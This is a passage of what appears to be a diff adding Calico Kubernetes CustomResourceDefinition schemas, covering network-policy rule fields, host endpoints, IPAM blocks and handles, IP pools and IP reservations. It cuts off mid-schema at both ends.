\n \tSelector = \"!has(my_label)\" matches + packets that are from other Calico-controlled \tendpoints + that do not have the label \"my_label\". \n \tNotSelector + = \"has(my_label)\" matches packets that are not from + Calico-controlled \tendpoints that do have the label \"my_label\". + \n The effect is that the latter will accept packets from + non-Calico sources whereas the former is limited to packets + from Calico-controlled endpoints." + type: string + serviceAccounts: + description: ServiceAccounts is an optional field that restricts + the rule to only apply to traffic that originates from + (or terminates at) a pod running as a matching service + account. + properties: + names: + description: Names is an optional field that restricts + the rule to only apply to traffic that originates + from (or terminates at) a pod running as a service + account whose name is in the list. + items: + type: string + type: array + selector: + description: Selector is an optional field that restricts + the rule to only apply to traffic that originates + from (or terminates at) a pod running as a service + account that matches the given label selector. If + both Names and Selector are specified then they are + AND'ed. + type: string + type: object + services: + description: "Services is an optional field that contains + options for matching Kubernetes Services. If specified, + only traffic that originates from or terminates at endpoints + within the selected service(s) will be matched, and only + to/from each endpoint's port. \n Services cannot be specified + on the same rule as Selector, NotSelector, NamespaceSelector, + Nets, NotNets or ServiceAccounts. \n Ports and NotPorts + can only be specified with Services on ingress rules." + properties: + name: + description: Name specifies the name of a Kubernetes + Service to match. + type: string + namespace: + description: Namespace specifies the namespace of the + given Service. If left empty, the rule will match + within this policy's namespace. + type: string + type: object + type: object + http: + description: HTTP contains match criteria that apply to HTTP + requests. + properties: + methods: + description: Methods is an optional field that restricts + the rule to apply only to HTTP requests that use one of + the listed HTTP Methods (e.g. GET, PUT, etc.) Multiple + methods are OR'd together. + items: + type: string + type: array + paths: + description: 'Paths is an optional field that restricts + the rule to apply to HTTP requests that use one of the + listed HTTP Paths. Multiple paths are OR''d together. + e.g: - exact: /foo - prefix: /bar NOTE: Each entry may + ONLY specify either a `exact` or a `prefix` match. The + validator will check for it.' + items: + description: 'HTTPPath specifies an HTTP path to match. + It may be either of the form: exact: : which matches + the path exactly or prefix: : which matches + the path prefix' + properties: + exact: + type: string + prefix: + type: string + type: object + type: array + type: object + icmp: + description: ICMP is an optional field that restricts the rule + to apply to a specific type and code of ICMP traffic. This + should only be specified if the Protocol field is set to "ICMP" + or "ICMPv6". + properties: + code: + description: Match on a specific ICMP code. If specified, + the Type value must also be specified. This is a technical + limitation imposed by the kernel's iptables firewall, + which Calico uses to enforce the rule. + type: integer + type: + description: Match on a specific ICMP type. For example + a value of 8 refers to ICMP Echo Request (i.e. pings). + type: integer + type: object + ipVersion: + description: IPVersion is an optional field that restricts the + rule to only match a specific IP version. + type: integer + metadata: + description: Metadata contains additional information for this + rule + properties: + annotations: + additionalProperties: + type: string + description: Annotations is a set of key value pairs that + give extra information about the rule + type: object + type: object + notICMP: + description: NotICMP is the negated version of the ICMP field. + properties: + code: + description: Match on a specific ICMP code. If specified, + the Type value must also be specified. This is a technical + limitation imposed by the kernel's iptables firewall, + which Calico uses to enforce the rule. + type: integer + type: + description: Match on a specific ICMP type. For example + a value of 8 refers to ICMP Echo Request (i.e. pings). + type: integer + type: object + notProtocol: + anyOf: + - type: integer + - type: string + description: NotProtocol is the negated version of the Protocol + field. + pattern: ^.* + x-kubernetes-int-or-string: true + protocol: + anyOf: + - type: integer + - type: string + description: "Protocol is an optional field that restricts the + rule to only apply to traffic of a specific IP protocol. Required + if any of the EntityRules contain Ports (because ports only + apply to certain protocols). \n Must be one of these string + values: \"TCP\", \"UDP\", \"ICMP\", \"ICMPv6\", \"SCTP\", + \"UDPLite\" or an integer in the range 1-255." + pattern: ^.* + x-kubernetes-int-or-string: true + source: + description: Source contains the match criteria that apply to + source entity. + properties: + namespaceSelector: + description: "NamespaceSelector is an optional field that + contains a selector expression. Only traffic that originates + from (or terminates at) endpoints within the selected + namespaces will be matched. When both NamespaceSelector + and another selector are defined on the same rule, then + only workload endpoints that are matched by both selectors + will be selected by the rule. \n For NetworkPolicy, an + empty NamespaceSelector implies that the Selector is limited + to selecting only workload endpoints in the same namespace + as the NetworkPolicy. \n For NetworkPolicy, `global()` + NamespaceSelector implies that the Selector is limited + to selecting only GlobalNetworkSet or HostEndpoint. \n + For GlobalNetworkPolicy, an empty NamespaceSelector implies + the Selector applies to workload endpoints across all + namespaces." + type: string + nets: + description: Nets is an optional field that restricts the + rule to only apply to traffic that originates from (or + terminates at) IP addresses in any of the given subnets. + items: + type: string + type: array + notNets: + description: NotNets is the negated version of the Nets + field. + items: + type: string + type: array + notPorts: + description: NotPorts is the negated version of the Ports + field. Since only some protocols have ports, if any ports + are specified it requires the Protocol match in the Rule + to be set to "TCP" or "UDP". + items: + anyOf: + - type: integer + - type: string + pattern: ^.* + x-kubernetes-int-or-string: true + type: array + notSelector: + description: NotSelector is the negated version of the Selector + field. See Selector field for subtleties with negated + selectors. + type: string + ports: + description: "Ports is an optional field that restricts + the rule to only apply to traffic that has a source (destination) + port that matches one of these ranges/values. This value + is a list of integers or strings that represent ranges + of ports. \n Since only some protocols have ports, if + any ports are specified it requires the Protocol match + in the Rule to be set to \"TCP\" or \"UDP\"." + items: + anyOf: + - type: integer + - type: string + pattern: ^.* + x-kubernetes-int-or-string: true + type: array + selector: + description: "Selector is an optional field that contains + a selector expression (see Policy for sample syntax). + \ Only traffic that originates from (terminates at) endpoints + matching the selector will be matched. \n Note that: in + addition to the negated version of the Selector (see NotSelector + below), the selector expression syntax itself supports + negation. The two types of negation are subtly different. + One negates the set of matched endpoints, the other negates + the whole match: \n \tSelector = \"!has(my_label)\" matches + packets that are from other Calico-controlled \tendpoints + that do not have the label \"my_label\". \n \tNotSelector + = \"has(my_label)\" matches packets that are not from + Calico-controlled \tendpoints that do have the label \"my_label\". + \n The effect is that the latter will accept packets from + non-Calico sources whereas the former is limited to packets + from Calico-controlled endpoints." + type: string + serviceAccounts: + description: ServiceAccounts is an optional field that restricts + the rule to only apply to traffic that originates from + (or terminates at) a pod running as a matching service + account. + properties: + names: + description: Names is an optional field that restricts + the rule to only apply to traffic that originates + from (or terminates at) a pod running as a service + account whose name is in the list. + items: + type: string + type: array + selector: + description: Selector is an optional field that restricts + the rule to only apply to traffic that originates + from (or terminates at) a pod running as a service + account that matches the given label selector. If + both Names and Selector are specified then they are + AND'ed. + type: string + type: object + services: + description: "Services is an optional field that contains + options for matching Kubernetes Services. If specified, + only traffic that originates from or terminates at endpoints + within the selected service(s) will be matched, and only + to/from each endpoint's port. \n Services cannot be specified + on the same rule as Selector, NotSelector, NamespaceSelector, + Nets, NotNets or ServiceAccounts. \n Ports and NotPorts + can only be specified with Services on ingress rules." + properties: + name: + description: Name specifies the name of a Kubernetes + Service to match. + type: string + namespace: + description: Namespace specifies the namespace of the + given Service. If left empty, the rule will match + within this policy's namespace. + type: string + type: object + type: object + required: + - action + type: object + type: array + ingress: + description: The ordered set of ingress rules. Each rule contains + a set of packet match criteria and a corresponding action to apply. + items: + description: "A Rule encapsulates a set of match criteria and an + action. Both selector-based security Policy and security Profiles + reference rules - separated out as a list of rules for both ingress + and egress packet matching. \n Each positive match criteria has + a negated version, prefixed with \"Not\". All the match criteria + within a rule must be satisfied for a packet to match. A single + rule can contain the positive and negative version of a match + and both must be satisfied for the rule to match." + properties: + action: + type: string + destination: + description: Destination contains the match criteria that apply + to destination entity. + properties: + namespaceSelector: + description: "NamespaceSelector is an optional field that + contains a selector expression. Only traffic that originates + from (or terminates at) endpoints within the selected + namespaces will be matched. When both NamespaceSelector + and another selector are defined on the same rule, then + only workload endpoints that are matched by both selectors + will be selected by the rule. \n For NetworkPolicy, an + empty NamespaceSelector implies that the Selector is limited + to selecting only workload endpoints in the same namespace + as the NetworkPolicy. \n For NetworkPolicy, `global()` + NamespaceSelector implies that the Selector is limited + to selecting only GlobalNetworkSet or HostEndpoint. \n + For GlobalNetworkPolicy, an empty NamespaceSelector implies + the Selector applies to workload endpoints across all + namespaces." + type: string + nets: + description: Nets is an optional field that restricts the + rule to only apply to traffic that originates from (or + terminates at) IP addresses in any of the given subnets. + items: + type: string + type: array + notNets: + description: NotNets is the negated version of the Nets + field. + items: + type: string + type: array + notPorts: + description: NotPorts is the negated version of the Ports + field. Since only some protocols have ports, if any ports + are specified it requires the Protocol match in the Rule + to be set to "TCP" or "UDP". + items: + anyOf: + - type: integer + - type: string + pattern: ^.* + x-kubernetes-int-or-string: true + type: array + notSelector: + description: NotSelector is the negated version of the Selector + field. See Selector field for subtleties with negated + selectors. + type: string + ports: + description: "Ports is an optional field that restricts + the rule to only apply to traffic that has a source (destination) + port that matches one of these ranges/values. This value + is a list of integers or strings that represent ranges + of ports. \n Since only some protocols have ports, if + any ports are specified it requires the Protocol match + in the Rule to be set to \"TCP\" or \"UDP\"." + items: + anyOf: + - type: integer + - type: string + pattern: ^.* + x-kubernetes-int-or-string: true + type: array + selector: + description: "Selector is an optional field that contains + a selector expression (see Policy for sample syntax). + \ Only traffic that originates from (terminates at) endpoints + matching the selector will be matched. \n Note that: in + addition to the negated version of the Selector (see NotSelector + below), the selector expression syntax itself supports + negation. The two types of negation are subtly different. + One negates the set of matched endpoints, the other negates + the whole match: \n \tSelector = \"!has(my_label)\" matches + packets that are from other Calico-controlled \tendpoints + that do not have the label \"my_label\". \n \tNotSelector + = \"has(my_label)\" matches packets that are not from + Calico-controlled \tendpoints that do have the label \"my_label\". + \n The effect is that the latter will accept packets from + non-Calico sources whereas the former is limited to packets + from Calico-controlled endpoints." + type: string + serviceAccounts: + description: ServiceAccounts is an optional field that restricts + the rule to only apply to traffic that originates from + (or terminates at) a pod running as a matching service + account. + properties: + names: + description: Names is an optional field that restricts + the rule to only apply to traffic that originates + from (or terminates at) a pod running as a service + account whose name is in the list. + items: + type: string + type: array + selector: + description: Selector is an optional field that restricts + the rule to only apply to traffic that originates + from (or terminates at) a pod running as a service + account that matches the given label selector. If + both Names and Selector are specified then they are + AND'ed. + type: string + type: object + services: + description: "Services is an optional field that contains + options for matching Kubernetes Services. If specified, + only traffic that originates from or terminates at endpoints + within the selected service(s) will be matched, and only + to/from each endpoint's port. \n Services cannot be specified + on the same rule as Selector, NotSelector, NamespaceSelector, + Nets, NotNets or ServiceAccounts. \n Ports and NotPorts + can only be specified with Services on ingress rules." + properties: + name: + description: Name specifies the name of a Kubernetes + Service to match. + type: string + namespace: + description: Namespace specifies the namespace of the + given Service. If left empty, the rule will match + within this policy's namespace. + type: string + type: object + type: object + http: + description: HTTP contains match criteria that apply to HTTP + requests. + properties: + methods: + description: Methods is an optional field that restricts + the rule to apply only to HTTP requests that use one of + the listed HTTP Methods (e.g. GET, PUT, etc.) Multiple + methods are OR'd together. + items: + type: string + type: array + paths: + description: 'Paths is an optional field that restricts + the rule to apply to HTTP requests that use one of the + listed HTTP Paths. Multiple paths are OR''d together. + e.g: - exact: /foo - prefix: /bar NOTE: Each entry may + ONLY specify either a `exact` or a `prefix` match. The + validator will check for it.' + items: + description: 'HTTPPath specifies an HTTP path to match. + It may be either of the form: exact: : which matches + the path exactly or prefix: : which matches + the path prefix' + properties: + exact: + type: string + prefix: + type: string + type: object + type: array + type: object + icmp: + description: ICMP is an optional field that restricts the rule + to apply to a specific type and code of ICMP traffic. This + should only be specified if the Protocol field is set to "ICMP" + or "ICMPv6". + properties: + code: + description: Match on a specific ICMP code. If specified, + the Type value must also be specified. This is a technical + limitation imposed by the kernel's iptables firewall, + which Calico uses to enforce the rule. + type: integer + type: + description: Match on a specific ICMP type. For example + a value of 8 refers to ICMP Echo Request (i.e. pings). + type: integer + type: object + ipVersion: + description: IPVersion is an optional field that restricts the + rule to only match a specific IP version. + type: integer + metadata: + description: Metadata contains additional information for this + rule + properties: + annotations: + additionalProperties: + type: string + description: Annotations is a set of key value pairs that + give extra information about the rule + type: object + type: object + notICMP: + description: NotICMP is the negated version of the ICMP field. + properties: + code: + description: Match on a specific ICMP code. If specified, + the Type value must also be specified. This is a technical + limitation imposed by the kernel's iptables firewall, + which Calico uses to enforce the rule. + type: integer + type: + description: Match on a specific ICMP type. For example + a value of 8 refers to ICMP Echo Request (i.e. pings). + type: integer + type: object + notProtocol: + anyOf: + - type: integer + - type: string + description: NotProtocol is the negated version of the Protocol + field. + pattern: ^.* + x-kubernetes-int-or-string: true + protocol: + anyOf: + - type: integer + - type: string + description: "Protocol is an optional field that restricts the + rule to only apply to traffic of a specific IP protocol. Required + if any of the EntityRules contain Ports (because ports only + apply to certain protocols). \n Must be one of these string + values: \"TCP\", \"UDP\", \"ICMP\", \"ICMPv6\", \"SCTP\", + \"UDPLite\" or an integer in the range 1-255." + pattern: ^.* + x-kubernetes-int-or-string: true + source: + description: Source contains the match criteria that apply to + source entity. + properties: + namespaceSelector: + description: "NamespaceSelector is an optional field that + contains a selector expression. Only traffic that originates + from (or terminates at) endpoints within the selected + namespaces will be matched. When both NamespaceSelector + and another selector are defined on the same rule, then + only workload endpoints that are matched by both selectors + will be selected by the rule. \n For NetworkPolicy, an + empty NamespaceSelector implies that the Selector is limited + to selecting only workload endpoints in the same namespace + as the NetworkPolicy. \n For NetworkPolicy, `global()` + NamespaceSelector implies that the Selector is limited + to selecting only GlobalNetworkSet or HostEndpoint. \n + For GlobalNetworkPolicy, an empty NamespaceSelector implies + the Selector applies to workload endpoints across all + namespaces." + type: string + nets: + description: Nets is an optional field that restricts the + rule to only apply to traffic that originates from (or + terminates at) IP addresses in any of the given subnets. + items: + type: string + type: array + notNets: + description: NotNets is the negated version of the Nets + field. + items: + type: string + type: array + notPorts: + description: NotPorts is the negated version of the Ports + field. Since only some protocols have ports, if any ports + are specified it requires the Protocol match in the Rule + to be set to "TCP" or "UDP". + items: + anyOf: + - type: integer + - type: string + pattern: ^.* + x-kubernetes-int-or-string: true + type: array + notSelector: + description: NotSelector is the negated version of the Selector + field. See Selector field for subtleties with negated + selectors. + type: string + ports: + description: "Ports is an optional field that restricts + the rule to only apply to traffic that has a source (destination) + port that matches one of these ranges/values. This value + is a list of integers or strings that represent ranges + of ports. \n Since only some protocols have ports, if + any ports are specified it requires the Protocol match + in the Rule to be set to \"TCP\" or \"UDP\"." + items: + anyOf: + - type: integer + - type: string + pattern: ^.* + x-kubernetes-int-or-string: true + type: array + selector: + description: "Selector is an optional field that contains + a selector expression (see Policy for sample syntax). + \ Only traffic that originates from (terminates at) endpoints + matching the selector will be matched. \n Note that: in + addition to the negated version of the Selector (see NotSelector + below), the selector expression syntax itself supports + negation. The two types of negation are subtly different. + One negates the set of matched endpoints, the other negates + the whole match: \n \tSelector = \"!has(my_label)\" matches + packets that are from other Calico-controlled \tendpoints + that do not have the label \"my_label\". \n \tNotSelector + = \"has(my_label)\" matches packets that are not from + Calico-controlled \tendpoints that do have the label \"my_label\". + \n The effect is that the latter will accept packets from + non-Calico sources whereas the former is limited to packets + from Calico-controlled endpoints." + type: string + serviceAccounts: + description: ServiceAccounts is an optional field that restricts + the rule to only apply to traffic that originates from + (or terminates at) a pod running as a matching service + account. + properties: + names: + description: Names is an optional field that restricts + the rule to only apply to traffic that originates + from (or terminates at) a pod running as a service + account whose name is in the list. + items: + type: string + type: array + selector: + description: Selector is an optional field that restricts + the rule to only apply to traffic that originates + from (or terminates at) a pod running as a service + account that matches the given label selector. If + both Names and Selector are specified then they are + AND'ed. + type: string + type: object + services: + description: "Services is an optional field that contains + options for matching Kubernetes Services. If specified, + only traffic that originates from or terminates at endpoints + within the selected service(s) will be matched, and only + to/from each endpoint's port. \n Services cannot be specified + on the same rule as Selector, NotSelector, NamespaceSelector, + Nets, NotNets or ServiceAccounts. \n Ports and NotPorts + can only be specified with Services on ingress rules." + properties: + name: + description: Name specifies the name of a Kubernetes + Service to match. + type: string + namespace: + description: Namespace specifies the namespace of the + given Service. If left empty, the rule will match + within this policy's namespace. + type: string + type: object + type: object + required: + - action + type: object + type: array + namespaceSelector: + description: NamespaceSelector is an optional field for an expression + used to select a pod based on namespaces. + type: string + order: + description: Order is an optional field that specifies the order in + which the policy is applied. Policies with higher "order" are applied + after those with lower order. If the order is omitted, it may be + considered to be "infinite" - i.e. the policy will be applied last. Policies + with identical order will be applied in alphanumerical order based + on the Policy "Name". + type: number + preDNAT: + description: PreDNAT indicates to apply the rules in this policy before + any DNAT. + type: boolean + selector: + description: "The selector is an expression used to pick pick out + the endpoints that the policy should be applied to. \n Selector + expressions follow this syntax: \n \tlabel == \"string_literal\" + \ -> comparison, e.g. my_label == \"foo bar\" \tlabel != \"string_literal\" + \ -> not equal; also matches if label is not present \tlabel in + { \"a\", \"b\", \"c\", ... } -> true if the value of label X is + one of \"a\", \"b\", \"c\" \tlabel not in { \"a\", \"b\", \"c\", + ... } -> true if the value of label X is not one of \"a\", \"b\", + \"c\" \thas(label_name) -> True if that label is present \t! expr + -> negation of expr \texpr && expr -> Short-circuit and \texpr + || expr -> Short-circuit or \t( expr ) -> parens for grouping \tall() + or the empty selector -> matches all endpoints. \n Label names are + allowed to contain alphanumerics, -, _ and /. String literals are + more permissive but they do not support escape characters. \n Examples + (with made-up labels): \n \ttype == \"webserver\" && deployment + == \"prod\" \ttype in {\"frontend\", \"backend\"} \tdeployment != + \"dev\" \t! has(label_name)" + type: string + serviceAccountSelector: + description: ServiceAccountSelector is an optional field for an expression + used to select a pod based on service accounts. + type: string + types: + description: "Types indicates whether this policy applies to ingress, + or to egress, or to both. When not explicitly specified (and so + the value on creation is empty or nil), Calico defaults Types according + to what Ingress and Egress rules are present in the policy. The + default is: \n - [ PolicyTypeIngress ], if there are no Egress rules + (including the case where there are also no Ingress rules) \n + - [ PolicyTypeEgress ], if there are Egress rules but no Ingress + rules \n - [ PolicyTypeIngress, PolicyTypeEgress ], if there are + both Ingress and Egress rules. \n When the policy is read back again, + Types will always be one of these values, never empty or nil." + items: + description: PolicyType enumerates the possible values of the PolicySpec + Types field. + type: string + type: array + type: object + type: object + served: true + storage: true +status: + acceptedNames: + kind: "" + plural: "" + conditions: [] + storedVersions: [] + +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: globalnetworksets.crd.projectcalico.org +spec: + group: crd.projectcalico.org + names: + kind: GlobalNetworkSet + listKind: GlobalNetworkSetList + plural: globalnetworksets + singular: globalnetworkset + scope: Cluster + versions: + - name: v1 + schema: + openAPIV3Schema: + description: GlobalNetworkSet contains a set of arbitrary IP sub-networks/CIDRs + that share labels to allow rules to refer to them via selectors. The labels + of GlobalNetworkSet are not namespaced. + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this representation + of an object. Servers should convert recognized schemas to the latest + internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource this + object represents. Servers may infer this from the endpoint the client + submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + type: object + spec: + description: GlobalNetworkSetSpec contains the specification for a NetworkSet + resource. + properties: + nets: + description: The list of IP networks that belong to this set. + items: + type: string + type: array + type: object + type: object + served: true + storage: true +status: + acceptedNames: + kind: "" + plural: "" + conditions: [] + storedVersions: [] + +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: hostendpoints.crd.projectcalico.org +spec: + group: crd.projectcalico.org + names: + kind: HostEndpoint + listKind: HostEndpointList + plural: hostendpoints + singular: hostendpoint + scope: Cluster + versions: + - name: v1 + schema: + openAPIV3Schema: + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this representation + of an object. Servers should convert recognized schemas to the latest + internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource this + object represents. Servers may infer this from the endpoint the client + submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + type: object + spec: + description: HostEndpointSpec contains the specification for a HostEndpoint + resource. + properties: + expectedIPs: + description: "The expected IP addresses (IPv4 and IPv6) of the endpoint. + If \"InterfaceName\" is not present, Calico will look for an interface + matching any of the IPs in the list and apply policy to that. Note: + \tWhen using the selector match criteria in an ingress or egress + security Policy \tor Profile, Calico converts the selector into + a set of IP addresses. For host \tendpoints, the ExpectedIPs field + is used for that purpose. (If only the interface \tname is specified, + Calico does not learn the IPs of the interface for use in match + \tcriteria.)" + items: + type: string + type: array + interfaceName: + description: "Either \"*\", or the name of a specific Linux interface + to apply policy to; or empty. \"*\" indicates that this HostEndpoint + governs all traffic to, from or through the default network namespace + of the host named by the \"Node\" field; entering and leaving that + namespace via any interface, including those from/to non-host-networked + local workloads. \n If InterfaceName is not \"*\", this HostEndpoint + only governs traffic that enters or leaves the host through the + specific interface named by InterfaceName, or - when InterfaceName + is empty - through the specific interface that has one of the IPs + in ExpectedIPs. Therefore, when InterfaceName is empty, at least + one expected IP must be specified. Only external interfaces (such + as \"eth0\") are supported here; it isn't possible for a HostEndpoint + to protect traffic through a specific local workload interface. + \n Note: Only some kinds of policy are implemented for \"*\" HostEndpoints; + initially just pre-DNAT policy. Please check Calico documentation + for the latest position." + type: string + node: + description: The node name identifying the Calico node instance. + type: string + ports: + description: Ports contains the endpoint's named ports, which may + be referenced in security policy rules. + items: + properties: + name: + type: string + port: + type: integer + protocol: + anyOf: + - type: integer + - type: string + pattern: ^.* + x-kubernetes-int-or-string: true + required: + - name + - port + - protocol + type: object + type: array + profiles: + description: A list of identifiers of security Profile objects that + apply to this endpoint. Each profile is applied in the order that + they appear in this list. Profile rules are applied after the selector-based + security policy. + items: + type: string + type: array + type: object + type: object + served: true + storage: true +status: + acceptedNames: + kind: "" + plural: "" + conditions: [] + storedVersions: [] + +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: ipamblocks.crd.projectcalico.org +spec: + group: crd.projectcalico.org + names: + kind: IPAMBlock + listKind: IPAMBlockList + plural: ipamblocks + singular: ipamblock + scope: Cluster + versions: + - name: v1 + schema: + openAPIV3Schema: + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this representation + of an object. Servers should convert recognized schemas to the latest + internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource this + object represents. Servers may infer this from the endpoint the client + submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + type: object + spec: + description: IPAMBlockSpec contains the specification for an IPAMBlock + resource. + properties: + affinity: + type: string + allocations: + items: + type: integer + # TODO: This nullable is manually added in. We should update controller-gen + # to handle []*int properly itself. + nullable: true + type: array + attributes: + items: + properties: + handle_id: + type: string + secondary: + additionalProperties: + type: string + type: object + type: object + type: array + cidr: + type: string + deleted: + type: boolean + strictAffinity: + type: boolean + unallocated: + items: + type: integer + type: array + required: + - allocations + - attributes + - cidr + - strictAffinity + - unallocated + type: object + type: object + served: true + storage: true +status: + acceptedNames: + kind: "" + plural: "" + conditions: [] + storedVersions: [] + +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: ipamconfigs.crd.projectcalico.org +spec: + group: crd.projectcalico.org + names: + kind: IPAMConfig + listKind: IPAMConfigList + plural: ipamconfigs + singular: ipamconfig + scope: Cluster + versions: + - name: v1 + schema: + openAPIV3Schema: + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this representation + of an object. Servers should convert recognized schemas to the latest + internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource this + object represents. Servers may infer this from the endpoint the client + submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + type: object + spec: + description: IPAMConfigSpec contains the specification for an IPAMConfig + resource. + properties: + autoAllocateBlocks: + type: boolean + maxBlocksPerHost: + description: MaxBlocksPerHost, if non-zero, is the max number of blocks + that can be affine to each host. + type: integer + strictAffinity: + type: boolean + required: + - autoAllocateBlocks + - strictAffinity + type: object + type: object + served: true + storage: true +status: + acceptedNames: + kind: "" + plural: "" + conditions: [] + storedVersions: [] + +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: ipamhandles.crd.projectcalico.org +spec: + group: crd.projectcalico.org + names: + kind: IPAMHandle + listKind: IPAMHandleList + plural: ipamhandles + singular: ipamhandle + scope: Cluster + versions: + - name: v1 + schema: + openAPIV3Schema: + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this representation + of an object. Servers should convert recognized schemas to the latest + internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource this + object represents. Servers may infer this from the endpoint the client + submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + type: object + spec: + description: IPAMHandleSpec contains the specification for an IPAMHandle + resource. + properties: + block: + additionalProperties: + type: integer + type: object + deleted: + type: boolean + handleID: + type: string + required: + - block + - handleID + type: object + type: object + served: true + storage: true +status: + acceptedNames: + kind: "" + plural: "" + conditions: [] + storedVersions: [] + +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: ippools.crd.projectcalico.org +spec: + group: crd.projectcalico.org + names: + kind: IPPool + listKind: IPPoolList + plural: ippools + singular: ippool + scope: Cluster + versions: + - name: v1 + schema: + openAPIV3Schema: + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this representation + of an object. Servers should convert recognized schemas to the latest + internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource this + object represents. Servers may infer this from the endpoint the client + submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + type: object + spec: + description: IPPoolSpec contains the specification for an IPPool resource. + properties: + allowedUses: + description: AllowedUse controls what the IP pool will be used for. If + not specified or empty, defaults to ["Tunnel", "Workload"] for back-compatibility + items: + type: string + type: array + blockSize: + description: The block size to use for IP address assignments from + this pool. Defaults to 26 for IPv4 and 112 for IPv6. + type: integer + cidr: + description: The pool CIDR. + type: string + disabled: + description: When disabled is true, Calico IPAM will not assign addresses + from this pool. + type: boolean + disableBGPExport: + description: 'Disable exporting routes from this IP Pool’s CIDR over + BGP. [Default: false]' + type: boolean + ipip: + description: 'Deprecated: this field is only used for APIv1 backwards + compatibility. Setting this field is not allowed, this field is + for internal use only.' + properties: + enabled: + description: When enabled is true, ipip tunneling will be used + to deliver packets to destinations within this pool. + type: boolean + mode: + description: The IPIP mode. This can be one of "always" or "cross-subnet". A + mode of "always" will also use IPIP tunneling for routing to + destination IP addresses within this pool. A mode of "cross-subnet" + will only use IPIP tunneling when the destination node is on + a different subnet to the originating node. The default value + (if not specified) is "always". + type: string + type: object + ipipMode: + description: Contains configuration for IPIP tunneling for this pool. + If not specified, then this is defaulted to "Never" (i.e. IPIP tunneling + is disabled). + type: string + nat-outgoing: + description: 'Deprecated: this field is only used for APIv1 backwards + compatibility. Setting this field is not allowed, this field is + for internal use only.' + type: boolean + natOutgoing: + description: When nat-outgoing is true, packets sent from Calico networked + containers in this pool to destinations outside of this pool will + be masqueraded. + type: boolean + nodeSelector: + description: Allows IPPool to allocate for a specific node by label + selector. + type: string + vxlanMode: + description: Contains configuration for VXLAN tunneling for this pool. + If not specified, then this is defaulted to "Never" (i.e. VXLAN + tunneling is disabled). + type: string + required: + - cidr + type: object + type: object + served: true + storage: true +status: + acceptedNames: + kind: "" + plural: "" + conditions: [] + storedVersions: [] + +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: ipreservations.crd.projectcalico.org +spec: + group: crd.projectcalico.org + names: + kind: IPReservation + listKind: IPReservationList + plural: ipreservations + singular: ipreservation + scope: Cluster + versions: + - name: v1 + schema: + openAPIV3Schema: + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this representation + of an object. Servers should convert recognized schemas to the latest + internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource this + object represents. Servers may infer this from the endpoint the client + submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + type: object + spec: + description: IPReservationSpec contains the specification for an IPReservation + resource. + properties: + reservedCIDRs: + description: ReservedCIDRs is a list of CIDRs and/or IP addresses + that Calico IPAM will exclude from new allocations. + items: + type: string + type: array + type: object + type: object + served: true + storage: true +status: + acceptedNames: + kind: "" + plural: "" + conditions: [] + storedVersions: [] + +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: kubecontrollersconfigurations.crd.projectcalico.org +spec: + group: crd.projectcalico.org + names: + kind: KubeControllersConfiguration + listKind: KubeControllersConfigurationList + plural: kubecontrollersconfigurations + singular: kubecontrollersconfiguration + scope: Cluster + versions: + - name: v1 + schema: + openAPIV3Schema: + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this representation + of an object. Servers should convert recognized schemas to the latest + internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource this + object represents. Servers may infer this from the endpoint the client + submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + type: 